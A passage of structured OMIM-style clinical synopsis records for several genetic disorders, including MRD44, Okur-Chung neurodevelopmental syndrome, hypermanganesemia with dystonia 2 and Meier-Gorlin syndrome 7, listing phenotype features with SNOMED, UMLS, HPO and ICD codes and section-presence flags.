'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': True,
'skeletalHandsExists': True,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': True,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617061,
'prefix': '#',
'preferredTitle': 'MENTAL RETARDATION, AUTOSOMAL DOMINANT 44; MRD44',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'headAndNeckHead': 'Microcephaly (in most patients, up to -5.4 SD) {UMLS C4313938} {HPO HP:0000252 C0424688} {EOM ID:8ae2118220c1308f IMG:Microcephaly-small.jpg}',
'headAndNeckFace': '''High forehead {UMLS C0239676 HP:0000348} {HPO HP:0000348 C0239676,C2677762} {EOM ID:f635aa5bd991cae4 IMG:Hairline,High_Anterior-small.jpg};\nPointed features {UMLS C4313937};\nMicrognathia {SNOMEDCT:32958008} {UMLS C0025990 HP:0000347} {HPO HP:0000347 C0025990,C0240295,C1857130} {EOM ID:8bbf61b4ad7ca2ef IMG:Micrognathia-small.jpg};\nPointed jaw {UMLS C2678198};\nAsymmetric face {SNOMEDCT:15253005} {UMLS C1306710 HP:0000324}''',
'headAndNeckEars': 'Large ears {SNOMEDCT:275480001} {UMLS C0554972 HP:0000400} {HPO HP:0000400 C0152421,C0554972,C1835581,C1848570,C1850189,C1855062,C1860838}',
'headAndNeckEyes': '''Upslanting palpebral fissures {SNOMEDCT:246799009} {UMLS C0423109 HP:0000582} {HPO HP:0000582 C0423109};\nDownslanting palpebral fissures {SNOMEDCT:246800008} {UMLS C0423110 HP:0000494} {HPO HP:0000494 C0423110};\nSynophrys {SNOMEDCT:253207002} {UMLS C0431447 HP:0000664} {HPO HP:0000664 C0431447} {EOM ID:5e417df50b2316f4 IMG:Synophrys-small.jpg};\nThick eyebrows {UMLS C1853487 HP:0000574} {HPO HP:0000574 C1853487}''',
'headAndNeckNose': '''Straight nose {UMLS C3554802};\nShort nose {UMLS C1854114 HP:0003196} {HPO HP:0003196 C0426414,C1854114} {EOM ID:daeb9fb85b0b970f IMG:Nose,Short-small.jpg}''',
'headAndNeckMouth': '''High palate {SNOMEDCT:27272007} {ICD10CM:Q38.5} {UMLS C0240635 HP:0000218} {HPO HP:0000218 C0240635} {EOM ID:51755789482fe3a8 IMG:Palate,High-small.jpg};\nFull lips {SNOMEDCT:248177001} {UMLS C0424485,C1836543 HP:0012471} {HPO HP:0012471 C1836543}''',
'headAndNeckTeeth': '''Dental crowding {SNOMEDCT:12351004} {ICD9CM:524.31} {UMLS C0040433 HP:0000678} {HPO HP:0000678 C0040433,C1317785,C4280617,C4280618} {EOM ID:997c7a12a3ac4f88 IMG:Dental_Crowding-small.jpg};\nHypodontia {SNOMEDCT:64969001} {ICD10CM:K00.0} {UMLS C0020608 HP:0000668} {HPO HP:0000668 C0020608}''',
'abdomenGastrointestinal': 'Feeding difficulties (in some patients) {UMLS C3276035} {HPO HP:0011968 C0232466}',
'skeletalSpine': 'Kyphosis (in some patients) {UMLS C3553093} {HPO HP:0002808 C0022821,C1845112}',
'skeletalHands': '''Brachydactyly {SNOMEDCT:43476002} {UMLS C0221357 HP:0001156} {HPO HP:0001156 C0221357};\nTapering fingers {SNOMEDCT:249768009} {UMLS C0426886 HP:0001182} {HPO HP:0001182 C0426886};\nBroad interphalangeal joints {UMLS C3808870};\nClinodactyly {SNOMEDCT:17268007} {UMLS C4551485,C0265610 HP:0030084,HP:0040019} {HPO HP:0030084 C0265610,C4280304} {EOM ID:483af428f909c76c IMG:Clinodactyly-small.jpg}''',
'skeletalFeet': '2-3 toe syndactyly {UMLS C4551570 HP:0004691} {HPO HP:0004691 C0432040}',
'neurologicCentralNervousSystem': '''Intellectual disability, borderline to moderate {UMLS C4313939};\nLearning difficulties {SNOMEDCT:161129001} {UMLS C0424939};\nDelayed motor development, mild {UMLS C1844429} {HPO HP:0001270 C1854301,C4020874};\nDelayed speech {SNOMEDCT:229721007} {UMLS C0241210 HP:0000750} {HPO HP:0000750 C0023012,C0233715,C0241210,C0454644};\nPoor speech {UMLS C1848207 HP:0002465} {HPO HP:0002465 C1848207,C4280574};\nSeizures (1 patient) {UMLS C2749200} {HPO HP:0001250 C0014544,C0036572}''',
'neurologicBehavioralPsychiatricManifestations': '''Autistic-like features {UMLS C2749029};\nAttention deficit-hyperactivity disorder {SNOMEDCT:406506008,7461003} {ICD10CM:F90,F90.9} {ICD9CM:314.9,314.01,314} {UMLS C1263846 HP:0007018} {HPO HP:0007018 C1263846};\nAggressive behavior {SNOMEDCT:61372001} {UMLS C0001807 HP:0006919,HP:0000718} {HPO HP:0000718 C0001807,C0424323,C1457883};\nObsessive-compulsive behavior {SNOMEDCT:12479006} {ICD10CM:R46.81} {UMLS C0600104 HP:0000722} {HPO HP:0000722 C0028768,C0600104}''',
'immunology': 'Recurrent infections (in some patients) {UMLS C3809599} {HPO HP:0002719 C0239998}',
'miscellaneous': 'Variable phenotype {UMLS C1837514 HP:0003812} {HPO HP:0003812 C1837514,C1839039,C1850667,C1866210}',
'molecularBasis': 'Caused by mutation in the triple functional domain gene (TRIO, {601893.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': True,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': True,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': True,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617062,
'prefix': '#',
'preferredTitle': 'OKUR-CHUNG NEURODEVELOPMENTAL SYNDROME; OCNDS',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'growthOther': 'Failure to thrive (in some patients) {UMLS C3278624} {HPO HP:0001508 C0231246,C2315100}',
'headAndNeckHead': 'Microcephaly (3 patients) {UMLS C4313934} {HPO HP:0000252 C0424688} {EOM ID:8ae2118220c1308f IMG:Microcephaly-small.jpg}',
'headAndNeckFace': '''Dysmorphic features, variable {UMLS C4015145};\nMicrognathia {SNOMEDCT:32958008} {UMLS C0025990 HP:0000347} {HPO HP:0000347 C0025990,C0240295,C1857130} {EOM ID:8bbf61b4ad7ca2ef IMG:Micrognathia-small.jpg}''',
'headAndNeckEars': '''Low-set ears {SNOMEDCT:95515009} {ICD10CM:Q17.4} {UMLS C0239234 HP:0000369} {HPO HP:0000369 C0239234};\nFolded ears {UMLS C1851901}''',
'headAndNeckEyes': '''Hypertelorism {SNOMEDCT:22006008} {ICD10CM:Q75.2} {ICD9CM:376.41} {UMLS C0020534 HP:0000316} {HPO HP:0000316 C0020534} {EOM ID:71d9f1be67c7f8b6 IMG:Eyes,Widely_Spaced-small.jpg};\nEpicanthal folds {SNOMEDCT:74824007} {UMLS C0229249,C0678230 HP:0000286} {HPO HP:0000286 C0678230};\nArched eyebrows {UMLS C1868571 HP:0002553} {HPO HP:0002553 C1868571,C4020849};\nSynophrys {SNOMEDCT:253207002} {UMLS C0431447 HP:0000664} {HPO HP:0000664 C0431447} {EOM ID:5e417df50b2316f4 IMG:Synophrys-small.jpg};\nPtosis {SNOMEDCT:11934000,29696001} {ICD10CM:H02.4,H02.40,H02.409} {ICD9CM:374.3,374.30} {UMLS C0005745,C0033377 HP:0000508} {HPO HP:0000508 C0005745} {EOM ID:1bd157b764ec7aea IMG:Ptosis-small.jpg}''',
'headAndNeckNose': '''Broad nasal bridge {SNOMEDCT:249321001} {UMLS C1849367 HP:0000431} {HPO HP:0000431 C1839764,C1849367} {EOM ID:e29866db35162165 IMG:Nasal_Bridge,Wide-small.jpg};\nUpturned nose {SNOMEDCT:708670007} {UMLS C1840077 HP:0000463} {HPO HP:0000463 C1840077}''',
'headAndNeckMouth': '''High palate {SNOMEDCT:27272007} {ICD10CM:Q38.5} {UMLS C0240635 HP:0000218} {HPO HP:0000218 C0240635} {EOM ID:51755789482fe3a8 IMG:Palate,High-small.jpg};\nThin upper lip {UMLS C1865017 HP:0000219} {HPO HP:0000219 C1865017}''',
'cardiovascularHeart': 'Congenital heart defects (in some patients) {UMLS C1970347} {HPO HP:0001627 C0018798,C0152021}',
'abdomenGastrointestinal': '''Feeding difficulties {SNOMEDCT:78164000} {ICD10CM:R63.3} {UMLS C0232466 HP:0011968} {HPO HP:0011968 C0232466};\nConstipation {SNOMEDCT:14760008} {ICD10CM:K59.0,K59.00} {ICD9CM:564.0,564.00} {UMLS C1963087,C0009806,C3641755,C4084722,C4084723,C4084724 HP:0002019} {HPO HP:0002019 C0009806,C0237326};\nGastric reflux {SNOMEDCT:225587003,698065002,235595009} {ICD10CM:K21,K21.9} {ICD9CM:530.81} {UMLS C0558176,C4317146,C0017168 HP:0002020}''',
'skeletal': 'Joint hyperextensibility (1 patient) {UMLS C4313933} {HPO HP:0001382 C1844820}',
'skeletalSpine': 'Scoliosis (1 patient) {UMLS C2750812} {HPO HP:0002650 C0037932,C0700208}',
'skeletalHands': '''Clinodactyly {SNOMEDCT:17268007} {UMLS C4551485,C0265610 HP:0030084,HP:0040019} {HPO HP:0030084 C0265610,C4280304} {EOM ID:483af428f909c76c IMG:Clinodactyly-small.jpg};\nBrachydactyly {SNOMEDCT:43476002} {UMLS C0221357 HP:0001156} {HPO HP:0001156 C0221357}''',
'muscleSoftTissue': 'Hypotonia {SNOMEDCT:398152000,398151007} {UMLS C0026827,C1858120 HP:0001290,HP:0001252} {HPO HP:0001290 C1858120}',
'neurologicCentralNervousSystem': '''Global developmental delay {SNOMEDCT:224958001} {ICD10CM:F88} {UMLS C0557874 HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nIntellectual disability {SNOMEDCT:110359009,228156007} {ICD9CM:317-319.99} {UMLS C3714756 HP:0001249} {HPO HP:0001249 C0025362,C0423903,C0917816,C1843367,C3714756,C4020876};\nDelayed speech {SNOMEDCT:229721007} {UMLS C0241210 HP:0000750} {HPO HP:0000750 C0023012,C0233715,C0241210,C0454644};\nPoor or absent speech {UMLS C3278212};\nAtonic seizures (1 patient) {UMLS C4313935} {HPO HP:0010819 C0270846,C1836509};\nPachygyria (1 patient) {UMLS C2749587} {HPO HP:0001302 C0266483};\nSimplified gyral pattern {UMLS C2749675 HP:0009879} {HPO HP:0009879 C2749675}''',
'neurologicBehavioralPsychiatricManifestations': '''Behavioral problems {SNOMEDCT:277843001,25786006} {UMLS C0233514 HP:0000708} {HPO HP:0000708 C0004941,C0233514};\nTantrums {SNOMEDCT:83943005} {UMLS C0233558};\nVolatile mood {SNOMEDCT:225657003} {UMLS C0558222};\nHand-flapping {SNOMEDCT:247922007} {UMLS C0424247};\nAttention deficit-hyperactivity disorder {SNOMEDCT:406506008,7461003} {ICD10CM:F90,F90.9} {ICD9CM:314.9,314.01,314} {UMLS C1263846 HP:0007018} {HPO HP:0007018 C1263846}''',
'immunology': '''Hypogammaglobulinemia (in some patients) {UMLS C3810300} {HPO HP:0004313 C0086438,C4048270};\nIgA deficiency {SNOMEDCT:29260007} {UMLS C0162538 HP:0002720} {HPO HP:0002720 C0162538};\nIgG deficiency {SNOMEDCT:123785006,12631000119106,190981001} {ICD10CM:D80.3} {UMLS C4520847,C0162539 HP:0004315} {HPO HP:0004315 C0162539}''',
'miscellaneous': 'Variable phenotype {UMLS C1837514 HP:0003812} {HPO HP:0003812 C1837514,C1839039,C1850667,C1866210}',
'molecularBasis': 'Caused by mutation in the casein kinase II, alpha-1 gene (CSNK2A1, {115440.0001}).',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': True,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': True,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': True,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617013,
'prefix': '#',
'preferredTitle': 'HYPERMANGANESEMIA WITH DYSTONIA 2; HMNDYT2',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckHead': 'Microcephaly, acquired (in some patients) {UMLS C3809179} {HPO HP:0005484 C1847514}',
'headAndNeckMouth': '''Bulbar dysfunction {UMLS C1839041};\nOromandibular dystonia {UMLS C2242577 HP:0012048} {HPO HP:0012048 C2242577}''',
'skeletal': 'Joint contractures {SNOMEDCT:7890003} {ICD10CM:M24.5} {ICD9CM:718.40,718.4} {UMLS C0009918 HP:0001371} {HPO HP:0001371 C0009917,C0009918,C0333068,C1850530}',
'skeletalSpine': 'Scoliosis {SNOMEDCT:298382003,20944008,111266001} {ICD10CM:Q67.5,M41,M41.9} {UMLS C0559260,C0036439,C4552773,C0700208 HP:0002650} {HPO HP:0002650 C0037932,C0700208}',
'muscleSoftTissue': 'Axial hypotonia {UMLS C1853743 HP:0008936} {HPO HP:0008936 C1853743}',
'neurologicCentralNervousSystem': '''Developmental regression {SNOMEDCT:609225004} {UMLS C1836830 HP:0002376} {HPO HP:0002376 C1836550,C1836830,C1850493,C1855009,C1855019,C1855996,C1857121,C1859678};\nDevelopmental delay (in some patients) {UMLS C3278623} {HPO HP:0001263 C0557874,C1864897,C4020875};\nIntellectual disability, variable {UMLS C4230864} {HPO HP:0001249 C0025362,C0423903,C0917816,C1843367,C3714756,C4020876};\nLearning disability {SNOMEDCT:1855002,408468001} {ICD10CM:F81.9} {UMLS C1321592,C0751265};\nPoor or absent speech (in some patients) {UMLS C4314139};\nDystonia {SNOMEDCT:15802004} {ICD10CM:G24,G24.9} {UMLS C0393593,C0013421 HP:0001332} {HPO HP:0001332 C0013421,C4020871};\nSpasticity {SNOMEDCT:221360009,397790002} {UMLS C0026838,C4553743 HP:0001257} {HPO HP:0001257 C0026838};\nAbnormal gait {SNOMEDCT:22325002} {ICD9CM:781.2} {UMLS C0575081 HP:0001288} {HPO HP:0001288 C0575081};\nScissoring {SNOMEDCT:64973003} {UMLS C0175735,C3890157};\nHyperreflexia {SNOMEDCT:86854008} {UMLS C0151889 HP:0001347} {HPO HP:0001347 C0151889};\nAnkle clonus {SNOMEDCT:39055007} {UMLS C0238651 HP:0011448} {HPO HP:0011448 C0238651};\nExtensor plantar responses {SNOMEDCT:246586009,366575004} {UMLS C0034935 HP:0003487} {HPO HP:0003487 C0034935};\nBulbar dysfunction {UMLS C1839041};\nLoss of independent ambulation {UMLS C3278950};\nParkinsonism {SNOMEDCT:32798002} {UMLS C0242422 HP:0001300} {HPO HP:0001300 C0242422};\nBradykinesia {SNOMEDCT:399317006} {UMLS C0233565 HP:0002067} {HPO HP:0002067 C0233565};\nTremor {SNOMEDCT:26079004} {ICD10CM:R25.1} {UMLS C0040822,C4554265,C1963252 HP:0001337} {HPO HP:0001337 C0040822};\nDyskinetic movements {UMLS C2678069};\nBrain MRI shows Mn deposition in the deep gray matter and white matter {UMLS C4314138};\nCerebral atrophy (in some patients) {UMLS C3808452} {HPO HP:0002059 C0154671,C0235946,C4020860};\nCerebellar atrophy (in some patients) {UMLS C3806758} {HPO HP:0001272 C0262404,C0740279,C4020873}''',
'laboratoryAbnormalities': 'Increased blood manganese {UMLS C0855887}',
'miscellaneous': '''Onset in infancy or first years of life {UMLS C3806309};\nProgressive disorder {UMLS C1864985 HP:0003676} {HPO HP:0003676 C0205329,C1864985};\nSome patients may respond to early chelation therapy {UMLS C4314136}''',
'molecularBasis': 'Caused by mutation in the solute carrier family 39 (zinc transporter), member 14 gene (SLC39A14, {608736.0001}).',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617063,
'prefix': '#',
'preferredTitle': 'MEIER-GORLIN SYNDROME 7; MGORS7',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthHeight': 'Short stature {SNOMEDCT:422065006,237837007,237836003} {ICD10CM:R62.52,E34.3} {ICD9CM:783.43} {UMLS C0013336,C0349588,C2237041,C2919142 HP:0004322,HP:0003510} {HPO HP:0004322 C0349588}',
'growthWeight': 'Low weight {SNOMEDCT:248342006} {ICD10CM:R63.6} {ICD9CM:783.22} {UMLS C0041667 HP:0004325} {HPO HP:0004325 C0041667,C1262477,C1844806}',
'growthOther': 'Growth failure, progressive {UMLS C4313929}',
'headAndNeckHead': '''Craniosynostosis {SNOMEDCT:57219006} {ICD10CM:Q75.0} {UMLS C0010278 HP:0005458,HP:0001363} {HPO HP:0001363 C0010278,C0235942};\nMicrocephaly, progressive {UMLS C1850456 HP:0000253} {HPO HP:0000253 C1850456}''',
'headAndNeckEars': '''Microtia {SNOMEDCT:35045004} {ICD10CM:Q17.2} {ICD9CM:744.23} {UMLS C1657142,C0152423 HP:0008551} {HPO HP:0008551 C0152423};\nHearing loss {SNOMEDCT:15188001,343087000,103276001} {ICD10CM:H91.9} {ICD9CM:389,389.9} {UMLS C3887873,C2029884,C1384666,C0018772,C0011053 HP:0000365} {HPO HP:0000365 C0011053,C0018772,C0339789,C1384666}''',
'headAndNeckEyes': '''Thin eyebrows {UMLS C4281771 HP:0045074} {HPO HP:0045074};\nProptosis {SNOMEDCT:18265008} {ICD10CM:H05.20} {ICD9CM:376.30} {UMLS C0015300 HP:0000520} {HPO HP:0000520 C0015300,C1837760,C1848490,C1862425} {EOM ID:765f49f1e824f0d2 IMG:Proptosis-small.jpg};\nStrabismus {SNOMEDCT:22066006,128602000} {ICD10CM:H50.40,H50.9} {ICD9CM:378.30} {UMLS C2020541,C1423541,C0038379 HP:0032012,HP:0000486} {HPO HP:0000486 C0038379};\nMyopia {SNOMEDCT:57190000} {ICD10CM:H52.1} {ICD9CM:367.1} {UMLS C0027092 HP:0000545} {HPO HP:0000545 C0027092}''',
'headAndNeckNose': 'Choanal atresia {SNOMEDCT:204508009} {ICD10CM:Q30.0} {ICD9CM:748.0} {UMLS C0008297 HP:0000453} {HPO HP:0000453 C0008297}',
'headAndNeckMouth': '''Small mouth {SNOMEDCT:14582003} {ICD10CM:Q18.5} {ICD9CM:744.84} {UMLS C0026034 HP:0000160} {HPO HP:0000160 C0026034};\nHigh palate {SNOMEDCT:27272007} {ICD10CM:Q38.5} {UMLS C0240635 HP:0000218} {HPO HP:0000218 C0240635} {EOM ID:51755789482fe3a8 IMG:Palate,High-small.jpg};\nCleft palate {SNOMEDCT:87979003,63567004} {ICD10CM:Q35.5,Q35,Q35.9} {ICD9CM:749.0,749.00} {UMLS C2981150,C0008925,C2240378 HP:0000175} {HPO HP:0000175 C0008925,C2981150}''',
'cardiovascularHeart': '''Atrial septal defect {SNOMEDCT:70142008,253366007,405752007} {ICD10CM:Q21.1} {UMLS C0018817 HP:0001631} {HPO HP:0001631 C0018817};\nVentricular septal defect {SNOMEDCT:30288003,768552007,253549006} {ICD10CM:Q21.0} {ICD9CM:745.4} {UMLS C0018818 HP:0001629} {HPO HP:0001629 C0018818};\nAtrioventricular canal {SNOMEDCT:253414002,15459006,77469004} {ICD10CM:Q21.2} {ICD9CM:745.60,745.6} {UMLS C1389018,C0231081,C0014116 HP:0001674,HP:0006695} {HPO HP:0001674 C1389018};\nAtrioventricular conduction block {SNOMEDCT:233917008} {ICD10CM:I44.3,I44.30} {ICD9CM:426.10} {UMLS C0004245 HP:0001678}''',
'respiratoryLung': 'Pulmonary hypoplasia (in 1 patient) {UMLS C4313917} {HPO HP:0002089 C0265783}',
'chestBreasts': 'Breast agenesis {UMLS C1386985}',
'abdomenGastrointestinal': '''Anterior anus {UMLS C4313928};\nAnal stenosis {SNOMEDCT:250037002,69914001} {UMLS C0262374,C4551936 HP:0002025} {HPO HP:0002025 C0262374};\nImperforate anus {SNOMEDCT:204731006,204712000} {ICD10CM:Q42.3} {UMLS C0003466 HP:0002023} {HPO HP:0002023 C0003466};\nAnorectal malformation {SNOMEDCT:33225004} {UMLS C3495676 HP:0012732};\nDuodenal stenosis {SNOMEDCT:73120006} {ICD10CM:K31.5} {UMLS C0238093,C4553901 HP:0100867} {HPO HP:0100867 C0238093,C1860791}''',
'genitourinaryExternalGenitaliaMale': '''Hypospadias {SNOMEDCT:416010008,204888000} {ICD10CM:Q54.1,Q54.9,Q54} {ICD9CM:752.61} {UMLS C1691215,C0848558 HP:0003244,HP:0000047} {HPO HP:0000047 C1691215};\nMicropenis {SNOMEDCT:34911001} {ICD10CM:Q55.62} {ICD9CM:752.64} {UMLS C1387005,C4551492,C0266435 HP:0000054,HP:0008736} {HPO HP:0000054 C0266435};\nUrethral stricture {SNOMEDCT:236647003,76618002} {ICD10CM:N35.9,N35.919,N35} {ICD9CM:598,598.9} {UMLS C4551691,C0041974 HP:0012227,HP:0008661} {HPO HP:0012227 C0041974}''',
'genitourinaryExternalGenitaliaFemale': 'Clitoromegaly {SNOMEDCT:80212005} {ICD10CM:N90.89} {ICD9CM:624.2} {UMLS C0156394 HP:0008665} {HPO HP:0008665 C0156394}',
'genitourinaryInternalGenitaliaMale': 'Undescended testes {SNOMEDCT:204878001} {ICD10CM:Q53.9} {ICD9CM:752.51} {UMLS C0010417 HP:0000028} {HPO HP:0000028 C0010417}',
'genitourinaryUreters': 'Vesicoureteral reflux {SNOMEDCT:197811007} {ICD10CM:N13.7,N13.70} {ICD9CM:593.7} {UMLS C0042580 HP:0000076} {HPO HP:0000076 C0042580}',
